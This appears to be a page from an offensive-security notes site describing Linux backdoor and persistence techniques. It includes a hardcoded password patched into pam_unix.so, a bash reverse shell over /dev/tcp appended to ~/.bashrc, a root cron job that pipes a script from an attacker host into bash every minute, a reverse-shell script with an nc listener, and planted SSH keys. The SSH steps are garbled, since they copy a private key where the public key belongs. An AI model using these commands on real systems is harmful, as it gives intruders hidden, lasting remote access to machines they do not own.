BuyMeACoffee

🚪Backdoors

A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

They are known for being discreet. Backdoors exist for a select group of people in the know to gain easy access to a system or application.

PAM

This backdoor essentially consists of adding your own password to the pam_unix.so file

pam_unix.so file is responsible for authentication

pam_unix.so uses the unix_verify_password function to verify to user's supplied password :

we added a new line to our code : if (strcmp(p, "0xMitsurugi") != 0 )

.bashsrc

If a user has bash as their login shell, the ".bashrc" file in their home directory is executed when an interactive session is launched.

Any user that log in often :

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Put a nc listener

CronJob

With a root access

cronjobs file -> /etc/cronjob

Configure a task where every minute a reverse shell is sent to you. Add this line into your cronjob file :

* *     * * *   root    curl http://$attacker_ip:8080/shell | bash

Add this to the shell file :

#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1

On the attacker machine :

nc -nvlp $port

SSH

Consists in saving our ssh keys in some user’s home directory. Then we can access it via ssh.

Generate ssh key

ssh-keygen

Copy our key into the user's .ssh directory

mkdir .ssh 
cp id_rsa .ssh/id_rsa
PreviousCover tracksNextReverse Shells

Last updated

Was this helpful?